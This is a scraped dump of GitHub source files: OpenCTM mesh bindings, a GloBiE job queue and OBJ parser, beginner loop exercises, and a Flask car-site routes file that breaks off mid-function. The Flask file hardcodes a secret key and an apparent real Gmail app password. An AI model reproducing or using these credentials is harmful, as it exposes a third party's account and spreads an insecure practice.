Exception('Could not find the OpenCTM shared library.')\n _lib = CDLL(_libName)\nif not _lib:\n raise Exception('Could not open the OpenCTM shared library.')\n\n# Functions\nctmNewContext = _lib.ctmNewContext\nctmNewContext.argtypes = [CTMenum]\nctmNewContext.restype = CTMcontext\n\nctmFreeContext = _lib.ctmFreeContext\nctmFreeContext.argtypes = [CTMcontext]\n\nctmGetError = _lib.ctmGetError\nctmGetError.argtypes = [CTMcontext]\nctmGetError.restype = CTMenum\n\nctmErrorString = _lib.ctmErrorString\nctmErrorString.argtypes = [CTMenum]\nctmErrorString.restype = c_char_p\n\nctmGetInteger = _lib.ctmGetInteger\nctmGetInteger.argtypes = [CTMcontext, CTMenum]\nctmGetInteger.restype = CTMint\n\nctmGetFloat = _lib.ctmGetFloat\nctmGetFloat.argtypes = [CTMcontext, CTMenum]\nctmGetFloat.restype = CTMfloat\n\nctmGetIntegerArray = _lib.ctmGetIntegerArray\nctmGetIntegerArray.argtypes = [CTMcontext, CTMenum]\nctmGetIntegerArray.restype = POINTER(CTMuint)\n\nctmGetFloatArray = _lib.ctmGetFloatArray\nctmGetFloatArray.argtypes = [CTMcontext, CTMenum]\nctmGetFloatArray.restype = POINTER(CTMfloat)\n\nctmGetNamedUVMap = _lib.ctmGetNamedUVMap\nctmGetNamedUVMap.argtypes = [CTMcontext, c_char_p]\nctmGetNamedUVMap.restype = CTMenum\n\nctmGetUVMapString = _lib.ctmGetUVMapString\nctmGetUVMapString.argtypes = [CTMcontext, CTMenum, CTMenum]\nctmGetUVMapString.restype = c_char_p\n\nctmGetUVMapFloat = _lib.ctmGetUVMapFloat\nctmGetUVMapFloat.argtypes = [CTMcontext, CTMenum, CTMenum]\nctmGetUVMapFloat.restype = CTMfloat\n\nctmGetNamedAttribMap = _lib.ctmGetNamedAttribMap\nctmGetNamedAttribMap.argtypes = [CTMcontext, c_char_p]\nctmGetNamedAttribMap.restype = CTMenum\n\nctmGetAttribMapString = _lib.ctmGetAttribMapString\nctmGetAttribMapString.argtypes = [CTMcontext, CTMenum, CTMenum]\nctmGetAttribMapString.restype = c_char_p\n\nctmGetAttribMapFloat = _lib.ctmGetAttribMapFloat\nctmGetAttribMapFloat.argtypes = [CTMcontext, CTMenum, CTMenum]\nctmGetAttribMapFloat.restype = CTMfloat\n\nctmGetString = _lib.ctmGetString\nctmGetString.argtypes = [CTMcontext, CTMenum]\nctmGetString.restype = c_char_p\n\nctmCompressionMethod = _lib.ctmCompressionMethod\nctmCompressionMethod.argtypes = [CTMcontext, CTMenum]\n\nctmCompressionLevel = _lib.ctmCompressionLevel\nctmCompressionLevel.argtypes = [CTMcontext, CTMuint]\n\nctmVertexPrecision = _lib.ctmVertexPrecision\nctmVertexPrecision.argtypes = [CTMcontext, CTMfloat]\n\nctmVertexPrecisionRel = _lib.ctmVertexPrecisionRel\nctmVertexPrecisionRel.argtypes = [CTMcontext, CTMfloat]\n\nctmNormalPrecision = _lib.ctmNormalPrecision\nctmNormalPrecision.argtypes = [CTMcontext, CTMfloat]\n\nctmUVCoordPrecision = _lib.ctmUVCoordPrecision\nctmUVCoordPrecision.argtypes = [CTMcontext, CTMenum, CTMfloat]\n\nctmAttribPrecision = _lib.ctmAttribPrecision\nctmAttribPrecision.argtypes = [CTMcontext, CTMenum, CTMfloat]\n\nctmFileComment = _lib.ctmFileComment\nctmFileComment.argtypes = [CTMcontext, c_char_p]\n\nctmDefineMesh = _lib.ctmDefineMesh\nctmDefineMesh.argtypes = [\n CTMcontext,\n POINTER(CTMfloat), CTMuint,\n POINTER(CTMuint), CTMuint,\n POINTER(CTMfloat)\n]\n\nctmAddUVMap = _lib.ctmAddUVMap\nctmAddUVMap.argtypes = [CTMcontext, POINTER(CTMfloat), c_char_p, c_char_p]\nctmAddUVMap.restype = CTMenum\n\nctmAddAttribMap = _lib.ctmAddAttribMap\nctmAddAttribMap.argtypes = [CTMcontext, POINTER(CTMfloat), c_char_p]\nctmAddAttribMap.restype = CTMenum\n\nctmLoad = _lib.ctmLoad\nctmLoad.argtypes = [CTMcontext, c_char_p]\n\nctmSave = _lib.ctmSave\nctmSave.argtypes = [CTMcontext, c_char_p]\n\n\ndef read(group, file):\n print('Load', file)\n try:\n ctm = ctmNewContext(CTM_IMPORT)\n ctmLoad(ctm, bytes(str(file), 'utf-8'))\n err = ctmGetError(ctm)\n if err != CTM_NONE:\n raise IOError(\"Error loading file: \" + str(ctmErrorString(err)))\n\n # Interpret information\n hasNormals = (ctmGetInteger(ctm, CTM_HAS_NORMALS) == CTM_TRUE)\n\n method = ctmGetInteger(ctm, CTM_COMPRESSION_METHOD)\n if method == CTM_METHOD_RAW:\n methodStr = \"RAW\"\n elif method == CTM_METHOD_MG1:\n methodStr = \"MG1\"\n elif method == CTM_METHOD_MG2:\n methodStr = \"MG2\"\n else:\n methodStr = \"Unknown\"\n\n triCount = ctmGetInteger(ctm, CTM_TRIANGLE_COUNT)\n vertCount = ctmGetInteger(ctm, CTM_VERTEX_COUNT)\n\n # Print information\n print(\"CTM_FILE_COMMENT:\", str(ctmGetString(ctm, CTM_FILE_COMMENT)))\n print(\" CTM_NAME:\", str(ctmGetString(ctm, CTM_NAME)))\n print(\" Triangle count:\", triCount)\n print(\" Vertex count:\", vertCount)\n print(\" Has normals:\", hasNormals)\n print(\" Method:\", methodStr)\n\n # List UV maps\n uvMapCount = ctmGetInteger(ctm, CTM_UV_MAP_COUNT)\n print(\" UV maps:\", uvMapCount)\n for i in range(uvMapCount):\n print(\" CTM_UV_MAP_\" + str(i + 1) + \": \\\"\" +\n str(ctmGetUVMapString(ctm, CTM_UV_MAP_1 + i, CTM_NAME)) +\n \"\\\", ref = \\\"\" +\n str(ctmGetUVMapString(ctm, CTM_UV_MAP_1 +\n i, CTM_FILE_NAME)) + \"\\\"\")\n\n # List attrib maps\n attribMapCount = ctmGetInteger(ctm, CTM_ATTRIB_MAP_COUNT)\n print(\"Attribute maps:\", attribMapCount)\n for i in range(attribMapCount):\n print(\n \" CTM_ATTRIB_MAP_\" + str(i + 1) + \": \\\"\" +\n str(ctmGetAttribMapString(ctm, CTM_ATTRIB_MAP_1 +\n i, CTM_NAME)) + \"\\\"\")\n\n pindices = ctmGetIntegerArray(ctm, CTM_INDICES)\n pvertices = ctmGetFloatArray(ctm, CTM_VERTICES)\n\n # Get normals\n pnormals = None\n if hasNormals:\n pnormals = ctmGetFloatArray(ctm, CTM_NORMALS)\n\n # Get texture coordinates\n ptexCoords = None\n if uvMapCount > 0:\n ptexCoords = ctmGetFloatArray(ctm, CTM_UV_MAP_1)\n\n mesh = scene.Mesh('ctm')\n\n for i in range(triCount):\n i0, i1, i2 = pindices[i * 3], pindices[i * 3 + 1], pindices[i * 3 +\n 2]\n v0, v1, v2 = pvertices[i0], pvertices[i1], pvertices[i2]\n tri = scene.Triangle(v0, v1, v2)\n mesh.add(tri)\n\n group.add(mesh)\n\n except Exception as e:\n print('Exception occurred:', e)\n\n finally:\n # Free the OpenCTM context\n ctmFreeContext(ctm)\n" }, { "alpha_fraction": 0.5117344260215759, "alphanum_fraction": 0.5151688456535339, "avg_line_length": 32.812904357910156, "blob_id": "b70f8e6c00315a8f2b731c63d7dbe872c6f3654d", "content_id": "a9c452e44c05db6d17e2dfb2e92786cb5641bedc", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5241, "license_type": "permissive", "max_line_length": 78, "num_lines": 155, "path": "/bakerman.py", "repo_name": "cg-saarland/GloBiE", "src_encoding": "UTF-8", "text": "import threading\nimport json\n\nfrom collections import namedtuple\nfrom time import sleep\nfrom typing import List\nfrom service import startWithDirectArgs\nfrom util import colorprint\n\nBakingJob = namedtuple('BakingJob', ['jobId', 'jobArgs', \"state\"])\n\n\nclass BakingMan(threading.Thread):\n def __init__(self):\n super().__init__()\n self.isProcessRunning = False\n self.currentId = 0\n self.queue: List[BakingJob] = []\n self.currentJob = None\n self.results: List[BakingJob] = []\n self.running = False\n\n def addJob(self, args):\n self.getUniqueId()\n newJob = BakingJob(str(self.currentId), args, \"pending\")\n self.queue.append(newJob)\n return self.currentId\n\n def stop(self, blocking=True):\n self.running = False\n if blocking:\n self.join()\n\n def run(self):\n self.running = True\n while self.running:\n if not self.isProcessRunning:\n if len(self.queue) > 0:\n BakingMan.isProcessRunning = True\n self.currentJob = self.queue.pop(0)\n try:\n self.runJob()\n except FileNotFoundError as e:\n BakingMan.isProcessRunning = False\n colorprint(\n \"File not found for jobId {}\".format(\n self.currentJob.jobId), 31)\n self.currentJob = None\n print(e)\n except json.decoder.JSONDecodeError as e:\n BakingMan.isProcessRunning = False\n colorprint(\n \"JSON not valid for jobId {}\".format(\n self.currentJob.jobId), 31)\n self.currentJob = None\n print(e)\n except Exception as e:\n BakingMan.isProcessRunning = False\n colorprint(\n \"Exception for jobId {}\".format(\n self.currentJob.jobId), 31)\n self.currentJob = None\n print(e)\n\n else:\n sleep(0.5)\n\n def runJob(self):\n colorprint(\n \"Starting runJob with jobId {}\".format(self.currentJob.jobId), 32)\n\n self.currentJob = self.currentJob._replace(state=\"running\")\n output = startWithDirectArgs(self.currentJob.jobArgs)\n\n result = {}\n if \"error\" in output and output[\"error\"] is not None:\n result = {\n \"jobId\": self.currentJob.jobId,\n \"jobArgs\": self.currentJob.jobArgs,\n \"state\": \"error\",\n \"error\": output[\"error\"]\n }\n colorprint(\"Error in startWithDirectArgs\", 31)\n\n else:\n result = {\n \"jobId\": self.currentJob.jobId,\n \"jobArgs\": self.currentJob.jobArgs,\n \"urlAoMapImage\": output[\"urlAoMapImage\"],\n \"urlAoMappingJson\": output[\"urlAoMappingJson\"],\n \"urlIgxcModified\": output[\"urlIgxcModified\"],\n \"urlIgxcOriginal\": output[\"urlIgxcOriginal\"],\n \"transforms\": output[\"transforms\"],\n \"state\": \"finished\",\n \"igxcModified\": output[\"igxcModified\"]\n }\n colorprint(\n \"Finished runJob with jobId {}\".format(self.currentJob.jobId),\n 32)\n\n self.results.append(result)\n self.isProcessRunning = False\n self.currentJob = None\n return result\n\n def getUniqueId(self) -> str:\n self.currentId += 1\n return str(self.currentId)\n\n def hasQueuedJob(self, jobId: str) -> bool:\n for entry in self.queue:\n if entry.jobId == jobId:\n return True\n return False\n\n def isJobFinished(self, jobId: str) -> bool:\n if self.hasJob(jobId):\n for entry in self.results:\n if entry[\"jobId\"] == jobId:\n return True\n return False\n\n def hasJob(self, jobId: str) -> bool:\n if self.currentJob != None and self.currentJob.jobId == jobId:\n return True\n\n for entry in self.results:\n if entry[\"jobId\"] == jobId:\n return True\n\n for entry in self.queue:\n if entry.jobId == jobId:\n return True\n return False\n\n def getJob(self, jobId: str) -> BakingJob:\n if self.currentJob != None and self.currentJob.jobId == jobId:\n return self.currentJob._asdict()\n\n for entry in self.results:\n if entry[\"jobId\"] == jobId:\n return entry\n\n for entry in self.queue:\n if entry.jobId == jobId:\n return entry._asdict()\n return None\n\n def getAllJobs(self) -> List[BakingJob]:\n allJobs = self.results[:]\n for entry in self.queue:\n allJobs.append(json.loads(json.dumps(entry._asdict())))\n if self.currentJob != None:\n allJobs.append(json.loads(json.dumps(self.currentJob._asdict())))\n return allJobs\n" }, { "alpha_fraction": 0.46477824449539185, "alphanum_fraction": 0.4875139892101288, "avg_line_length": 26.94791603088379, "blob_id": "a4cd3518d5ffebbd848704e9af953a73cf02adf5", "content_id": "087ce74fec63e0cf4bc8c87764481cb896ac20e4", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2683, "license_type": "permissive", "max_line_length": 78, "num_lines": 96, "path": "/wavefront.py", "repo_name": "cg-saarland/GloBiE", "src_encoding": "UTF-8", "text": "import glm\nimport scene\n\n\ndef readVec2(data):\n v = [float(val) for val in data[0:2]]\n return glm.vec2(*v)\n\n\ndef readVec3(data):\n v = [float(val) for val in data[0:3]]\n return glm.vec3(*v)\n\n\nclass Parser(object):\n def __init__(self, group):\n self.vertices = [glm.vec3(0.0)]\n self.normals = [glm.vec3(0.0)]\n self.texcoords = [glm.vec2(0.0)]\n self.mesh = None\n self.group = group\n\n def read_file(self, file):\n for line in file:\n self.parse(line)\n\n def parse(self, line):\n if line.startswith('#'):\n return\n\n values = line.split()\n if len(values) < 2:\n return\n\n attrib = 'parse_%s' % values[0]\n args = values[1:]\n\n if hasattr(self, attrib):\n parse_function = getattr(self, attrib)\n parse_function(args)\n # else:\n # print(\"unable to read line:\", line)\n\n def parse_v(self, args):\n self.vertices.append(readVec3(args))\n\n def parse_vn(self, args):\n self.normals.append(readVec3(args))\n\n def parse_vt(self, args):\n self.texcoords.append(readVec2(args))\n\n def parse_o(self, args):\n self.mesh = scene.Mesh(args[0])\n self.group.add(self.mesh)\n\n def parse_f(self, args):\n if self.mesh is None:\n self.parse_o(['unnamed mesh'])\n\n prim0 = scene.Triangle(*[glm.vec3(0.0), glm.vec3(0.0), glm.vec3(0.0)])\n self.mesh.add(prim0)\n\n for i, v in enumerate(args):\n vidx, tidx, nidx = (list(map(int, [j or 0\n for j in v.split('/')])) +\n [0, 0])[:3]\n\n # wrap index around\n if vidx < 0:\n vidx = len(self.vertices) - vidx\n if tidx < 0:\n tidx = len(self.texcoords) - tidx\n if nidx < 0:\n nidx = len(self.normals) - nidx\n\n if i < 3:\n prim0.vertex(i, self.vertices[vidx], self.texcoords[tidx],\n self.normals[nidx])\n elif i == 3:\n # second triangle for quad face\n prim1 = scene.Triangle(prim0.vertices[0], prim0.vertices[2],\n self.vertices[vidx])\n prim1.texcoords = [\n prim0.texcoords[0], prim0.texcoords[2],\n self.texcoords[tidx]\n ]\n prim1.normals = [\n prim0.normals[0], prim0.normals[2], self.normals[nidx]\n ]\n self.mesh.add(prim1)\n\n\ndef read(group, file):\n parser = Parser(group)\n parser.read_file(file)\n" } ]
19
thealanberman/bikeshare
https://github.com/thealanberman/bikeshare
6310f6a32f0026dcb13077430926d2037aa40ab2
fc716a11a4d1da37e0b2c3935d31d8f3b2b3243a
82956fc28ed36951581b06b86886642b3cbfc726
refs/heads/master
2021-01-12T20:39:42.512158
2016-09-16T07:04:33
2016-09-16T07:04:33
68,359,455
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5918367505073547, "alphanum_fraction": 0.5969387888908386, "avg_line_length": 29.153846740722656, "blob_id": "f01052e816981967f589211a52ab11f5aa04c7fd", "content_id": "e9c08539454d4ebb97c2586764b3f9a3af8d3583", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 784, "license_type": "no_license", "max_line_length": 78, "num_lines": 26, "path": "/bikeshare.py", "repo_name": "thealanberman/bikeshare", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\n\"\"\"bikeshare.py: Sends alerts as bikes or docks become scarce at key times.\"\"\"\n\n__author__ = \"Alan Berman\"\n\nimport requests, smtplib\n\ndef main():\n stationId = 65\n url = \"http://feeds.bayareabikeshare.com/stations/stations.json\"\n r = requests.get(url)\n stations = r.json()['stationBeanList']\n response = \"\"\n\n for item in stations:\n if item['id'] == stationId:\n if item['availableBikes'] < 2 or item['availableDocks'] < 2:\n response = str(item['availableBikes']) + \" bikes left. \"\n response += str(item['availableDocks']) + \" open docks. \"\n response += \"%s (#%s)\" % (item['stationName'], item['id'])\n return { 'response': response }\n\nmain()\n\ndef getStationStatus(station, stationId):\n" } ]
1
priyanshumishra1009/loop_basic_question.py
https://github.com/priyanshumishra1009/loop_basic_question.py
047f198cfdb134304518078d3b203689cd29cb4d
e86a2a461368e9c5e74dae8118820ae46b8f7e7e
404793c5a2b82e5bfd19a817881d0bee85472a51
refs/heads/main
2023-06-11T14:24:33.470793
2021-07-07T20:59:40
2021-07-07T20:59:40
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.31586122512817383, "alphanum_fraction": 0.3490380346775055, "avg_line_length": 13.767337799072266, "blob_id": "a66212ce6a9189f5b2ae3e173c03e7d02b25cc8d", "content_id": "16f72f6f50c865ca95a97158c265a03cfabaa406", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6601, "license_type": "permissive", "max_line_length": 119, "num_lines": 447, "path": "/loop.py", "repo_name": "priyanshumishra1009/loop_basic_question.py", "src_encoding": "UTF-8", "text": "### sum print ###\n\n# a=50\n# b=0\n# while a<60:\n# c=int(input(\"enter the number:\"))\n# b=b+c\n# a+=1\n# print(b)\n\n\n# a=50\n# b=0\n# while a-60:\n# c=int(input(\"enter the number:\"))\n# b=b+c\n# a+=1\n# print(b)\n\n\n# a=int(input(\"enter the number: \"))\n# b=0\n# x=0\n# while b<a:\n# c=int(input())\n# b+=1\n# x+=c\n# print(x)\n\n\n#######################################\n#### sum and average of the element #####\n\n# a=3\n# b=1\n# c=0\n# e=0\n# while b<=a:\n# p=int(input())\n# c+=p\n# e=c/a\n# b+=1\n# print(c)\n# print(e)\n\n#######################\n# ### prime number ####\n\n# a=int(input())\n# f=0\n# b=2\n# while b<=a/2:\n# if a%b==0:\n# f=1\n# break\n# b=b+1\n# if f==0:\n# print(\"prime\")\n# else:\n# print(\" not prime number\")\n\n\n# a=int(input(\" \"))\n# b=2\n# while b<a:\n# if a%b==0:\n# print(\"no\")\n# break\n# b+=1\n# else:\n# print(\"yes\")\n\n\n# a=20\n# while a<=100:\n# print(a)\n# a+=2\n\n\n# a=7\n# while a<100:\n# print(a)\n# a+=7\n\n\n# a=30\n# b=0\n# while a<=40:\n# b=a+b\n# a=a+2\n# print(b)\n\n\n# a=12\n# b=0\n# while a<=420:\n# b=a+b\n# a+=1\n# print(b)\n\n\n# a=30\n# b=0\n# while a<420:\n# if a%8==0:\n# b=a+b\n# print(\"a\",a)\n# a+=1\n# print(b)\n\n#######################\n#### average print ####\n\n# a=1\n# b=0\n# while a<=11:\n# c=int(input())\n# b=b+c\n# d=b/11\n# a+=1\n# if d%5==0:\n# print(\"yes\")\n# else:\n# print(\"no\")\n# print(d)\n\n#################################################\n#### odd number pisitive even number negative ####\n\n# a=1\n# b=2\n# while a<=100:\n# print(a)\n# print(b*(-1))\n# a+=2\n# b+=2\n\n######################\n#### gussing game ####\n\n# a=5\n# b=1\n# c=0\n# while b<=3:\n# c=int(input(\"enter the number: \"))\n# b+=1\n# if a==c:\n# print(\"won\")\n# break\n# else:\n# print(\"try again\")\n# else:\n# print(\"you lost the game \")\n \n\n# a=5\n# b=1\n# c=0\n# while b<=3:\n# c=int(input(\"enter the number: \"))\n# b+=1\n# if a==c:\n# print(\"won\")\n# break\n# elif a>c:\n# print(\"chota hai try again\")\n# else:\n# print(\"bada hai try again\")\n# else:\n# print(\"you lost the game \")\n\n\n# a=1\n# b=0\n# while a<=50:\n# a,b=b,a\n# c=a+b\n# print(c)\n# a+=1 \n\n\n# c=0\n# d=1\n# while c<3:\n# c=c+1\n# d=d*c\n# print(c,d)\n# else:\n# # print(c,d)\n\n\n# i = 0\n# while(i<5):\n# j = 0\n# while(j<5): #loop2\n# if (j > 3): \n# break \n# else:\n# print (\"*\") \n# j = j + 1 \n# print ('')\n# i = i + 1\n \n\n# x = 0\n# while(x<7):\n# if (x == 3 or x==5):\n# x = x + 1\n# continue\n# print(x)\n# x = x + 1 \n\n\n#####################################################\n#### 2 number multiply without use multiply sign ####\n\n# a=int(input(\"enter the number: \"))\n# b=int(input(\"enter the number: \"))\n# c=0\n# co=0\n# while c<b:\n# co=co+a\n# c+=1\n# print(co)\n\n\n################################\n##### Fibonacci Series #####\n\n# a=int(input())\n# b=0\n# c=1\n# d=0\n# while d<=a:\n# # print(b)\n# e=b+c\n# b=c\n# c=e\n# d+=1\n# print(b)\n\n\n###################################################\n##### star pattern difference difference type #####\n\n# a=int(input())\n# b=0\n# while b<+a:\n# print(\" \"*(a-2)+\" *\"*(a-b))\n# b+=1\n\n# a=int(input())\n# b=0\n# while b<+a:\n# print(\" \"*(a+b)+\" *\"*(a-b))\n# b+=1\n\n# a=int(input())\n# b=0\n# while b<+a:\n# print(\" \"*(a-b)+\"* \"*(a-b))\n# b+=1\n\n# a=int(input( ))\n# b=1\n# while b<=a:\n# print(\" \"*(a-b)+\"* \"*b)\n# b+=1\n \n# a=int(input())\n# b=1\n# while b<+a:\n# print(\" \"*(a-b)+\" *\"*a)\n# b+=1\n\n# a=int(input())\n# b=0\n# while b<+a:\n# print(\" \"*(a-b)+\" *\"*(a-b))\n# b+=1\n\n# a=int(input( ))\n# b=1\n# while b<=a:\n# print(\" \"*(a-b)+\"* \"*b)\n# b+=2\n\n\n##########################################################\n### odd number is positive and even number is negative ###\n\n# a=1\n# b=2\n# while a<=100:\n# print(a,b*(-1))\n# a+=2\n# b+=2\n\n\n################################\n### this code is hppy number ###\n\n# num=int(input())\n# n=num\n# sum=0\n# while sum!= 1 and sum!=4:\n# sum=0\n# while n>0:\n# digit=n%10\n# sum=sum+digit**2\n# n=n//10\n# n=sum\n# if sum==1:\n# print(\"h\")\n# else:\n# print(\"n\")\n\n\n#####################\n##### Factiriol #####\n\n# a=int(input())\n# b=1\n# for i in range (a):\n# b=b*(i+1)\n# print(b)\n\n\n#########################################\n#### This code is String palindrome ####\n\n# x=input(\" \")\n# b=\"\"\n# for i in x:\n# b=i+b\n# if x==b:\n# print(\"y\")\n# else:\n# print(\"n\")\n\n\n########################## \n#### R pattern print ####\n\n# x=4\n# y=1\n# while y!=5:\n# if y==1:\n# print(\"* \"*x)\n# print(\"* \",\" \"*2,\"*\")\n# print(\"* \"*x)\n# else:\n# print(\"*\",\" \"*(y-2),\"*\")\n# y+=1\n \n\n#########################\n### table print 2*1=2 ###\n\n# a=int(input())\n# for i in range (1,11):\n# print(str(a), \"*\", str(i), \"=\", str(i*a))\n\n# a= int(input())\n# for i in range (1, a+1):\n# for j in range (1,11):\n# print(i*j)\n# print()\n\n\n#########################################\n###### odd and even number ##########\n# a=1\n# while a<=100:\n# a+=1\n# if a%2==0:\n# print(a,\"even\")\n# if a==100:\n# a-=99\n# else:\n# print(a,\"odd\")\n# a+=1\n\n\n##############################################\n#### odd even print (first even then odd) ####\n\n# a=2\n# while a<=200:\n# if a<=100:\n# if a%2==0:\n# print(a)\n# else:\n# if a%2!=0:\n# print(a-100)\n# a+=1 \n\n\n########################################################################\n#### first pehle ke three number even then baad ke three number odd ####\n\n# a=int(input())\n# f=a\n# v=f\n# i=0\n# while a>0:\n# a-=1\n# if a%2==0:\n# print(a,end=' ')\n# if f-a==5:\n# break\n# elif f-a==6:\n# break\n# print()\n# while f>0:\n# f+=1\n# if f%2!=0:\n# print(f,end=' ')\n# if f-v==5:\n# break\n# elif f-v==6:\n# break\n# print()\n\n\n########################################\n### without use number print 1 to 10 ###\n\n# a=ord(\"A\")\n# b=ord(\"J\")\n# c=ord(\"@\")\n# x = a-c\n# while a <= b:\n# print(a-c)\n# a+=x\n\n\n##################################\n####### integer palindrome #######\n\n# x=int(input())\n# s = str(x)\n# rs = \"\".join(list(reversed(s)))\n# if rs != s:\n# print (False)\n# else:\n# print(True)\n" }, { "alpha_fraction": 0.8061224222183228, "alphanum_fraction": 0.8061224222183228, "avg_line_length": 48, "blob_id": "644e50467911e841e9bebb25c05a34263aef9edf", "content_id": "1677ddfe99548e3155d25e5f695bb49a9f785edf", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 98, "license_type": "permissive", "max_line_length": 72, "num_lines": 2, "path": "/README.md", "repo_name": "priyanshumishra1009/loop_basic_question.py", "src_encoding": "UTF-8", "text": "# loop_basic_question.py\nThese are some basic question of loops which i did while learning python\n" } ]
2
Reih02/FH4_Cars
https://github.com/Reih02/FH4_Cars
51a29447962cde8b9a58a0d26137e9e44b4f423e
f03536208796d616cbdba4197390ce15f70e2ee6
0e1b350ea3fa1daa8899e512ed07427e04f66564
refs/heads/master
2022-12-28T00:04:30.028648
2020-09-10T22:16:17
2020-09-10T22:16:17
248,074,158
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6019737124443054, "alphanum_fraction": 0.6069079041481018, "avg_line_length": 23.31999969482422, "blob_id": "ba3a39846754180cd0e765f30193b1269aa7ab6d", "content_id": "27bc1d8eff7364b8f07dbe135649b0e6ac31ae8d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "HTML", "length_bytes": 608, "license_type": "no_license", "max_line_length": 84, "num_lines": 25, "path": "/templates/msearch.html", "repo_name": "Reih02/FH4_Cars", "src_encoding": "UTF-8", "text": "{%extends 'layout.html'%}\n\n{%block content%}\n<title>\n MANUFACTURER LIST\n</title>\n<div id = 'smallbox'>\n <h2>\n Manufacturers matching your search:\n </h2>\n</div>\n\n<div id = 'largebox'>\n <!-- if list 'manufacturer' in msearch route has length (i.e it exists) -->\n {% if manufacturer|length == 0 %}\n <p> No manufacturers found! </p>\n {% else %}\n {% for manufacturers in manufacturer %}\n <!--adds each image onto page by using its value in the database-->\n <p><a href=\"/manufacturer/{{ manufacturers.id }}\">{{ manufacturers.name }}</p>\n {% endfor %}\n {% endif %}\n</div>\n\n{%endblock%}\n" }, { "alpha_fraction": 0.6681606769561768, "alphanum_fraction": 0.6728057861328125, "avg_line_length": 38.97068405151367, "blob_id": "c27f7c6ecb7e6814808fe826a32779a4dcfecea0", "content_id": "066ce050f73a5d7e02437bfd7cb79df16c0151e0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 12271, "license_type": "no_license", "max_line_length": 115, "num_lines": 307, "path": "/routes.py", "repo_name": "Reih02/FH4_Cars", "src_encoding": "UTF-8", "text": "from flask import Flask, render_template, flash, redirect, url_for, request, abort\nfrom flask_sqlalchemy import SQLAlchemy\nfrom werkzeug.urls import url_parse\nimport models\nfrom forms import LoginForm, RegistrationForm, SearchForm\nfrom flask_login import logout_user, login_user, LoginManager, current_user, login_required\nfrom flask_mail import Mail\nfrom forms import ResetPasswordRequestForm, ResetPasswordForm\nfrom sqlalchemy.exc import IntegrityError\n\n# initialisation stuff\napp = Flask(__name__)\n\n# defines secret key for use in anything encrypted(logins, password hashing, etc.)\napp.config['SECRET_KEY'] = 'vr2YEHkNyPsuF3TdFMsL5a67veTPBtjrfx5FrdRLky5TQf3wAL'\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///FH4_cars.db'\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\napp.config['MAIL_SERVER'] = 'smtp.gmail.com'\napp.config['MAIL_PORT'] = 587\napp.config['MAIL_USE_TLS'] = 1\napp.config['MAIL_USERNAME'] = '[email protected]'\napp.config['MAIL_PASSWORD'] = 'pamrxmhwpfvgsoxb'\napp.config['ADMINS'] = '[email protected]'\n\ndb = SQLAlchemy(app)\nloginTest = LoginManager(app)\nloginTest.login_view = 'login'\n\nmail = Mail(app)\n# ---------------------\n# had to put this import down here because it somehow made the import work\nfrom email1 import send_password_reset_email\n\n# defines searchform for use in search functions\[email protected]_processor\ndef inject_search():\n searchform = SearchForm()\n return dict(searchform=searchform)\n\n# home route (where users land upon visit)\[email protected]('/')\ndef home():\n return render_template(\"home.html\", page_title=\"WELCOME TO FH4 CARS\")\n\n# route to show all cars\[email protected]('/cars', methods=['GET', 'POST'])\ndef cars():\n cars = models.Car.query.all()\n # defines search form under form variable for use later\n form = SearchForm()\n # if search form validates:\n if form.validate_on_submit():\n # run next route (carsearch)\n return redirect(url_for('carsearch', search=form.query.data))\n else:\n if request.method == 'POST':\n flash('Please do not enter more than 30 characters in a search')\n # go back\n return render_template('list_cars.html', page_title=\"CAR LIST\",\n cars=cars)\n\n# route to show a user's searched car matches\[email protected]('/carsearch/<search>', methods=['GET', 'POST'])\ndef carsearch(search):\n # get car names from the database like that of the search input\n # (using SQLAlchemy's built-in algorithm)\n car = models.Car.query.filter(models.Car.name.ilike('%{}%'.format(search))).all()\n print(car)\n # returs name of cars in a loop as there are usually multiple results\n for i in car:\n print(i.name)\n return render_template('csearch.html', page_title=\"YOUR SEARCH\", car=car)\n\n\n# route to show info on the car the user selects/clicks\[email protected]('/car/<int:info>', methods=['GET', 'POST'])\ndef car(info):\n car = models.Car.query.filter_by(id=info).first_or_404()\n # gets the manufacturer that made the car\n manufacturer = models.Manufacturer.query.filter_by(id=car.manufacturerid).first()\n title = car.name\n # used following try & except in order to work around the attribute error\n # I was getting if the car was not favourited by user\n try:\n favourited = models.UserCar.query.filter_by(uid=current_user.id, cid=info).all()\n except AttributeError:\n favourited = None\n return render_template('show_cars.html', page_title=title, car=car,\n manufacturer=manufacturer,\n favourited=favourited)\n\n\n# route to add favourite car to user's profile\[email protected]('/favourite/<int:id>', methods=['GET', 'POST'])\n@login_required\ndef favourite(id):\n # adds favourite car by assigning the current user's id to the uid table,\n # and the car's id to the cid table\n is_favourited = models.UserCar.query.filter_by(uid=current_user.id, cid=id).first()\n if is_favourited is None:\n try:\n favourite_car = models.UserCar(uid=current_user.id, cid=id)\n db.session.add(favourite_car)\n db.session.commit()\n except:\n abort(500)\n return redirect(url_for('car', info=id))\n\n\n# route to delete a favourite car from a user's profile\[email protected]('/delete/<int:id>', methods=['GET', 'POST'])\n@login_required\ndef delete(id):\n # deletes favourite car by getting the car where uid is the current user's\n # id and the cid is the current car's id in the favourited car table,\n # and removing it from the database\n try:\n favourite_car = db.session.query(models.UserCar).filter_by(uid=current_user.id, cid=id).first_or_404()\n db.session.delete(favourite_car)\n db.session.commit()\n except:\n redirect(url_for('car', info=id))\n return redirect(url_for('car', info=id))\n\n\n# route to show all manufacturers\[email protected]('/manufacturers', methods=['GET', 'POST'])\ndef manufacturers():\n form = SearchForm()\n manufacturers = models.Manufacturer.query.all()\n if form.validate_on_submit():\n return redirect(url_for('manufacturersearch', search=form.query.data))\n else:\n if request.method == 'POST':\n 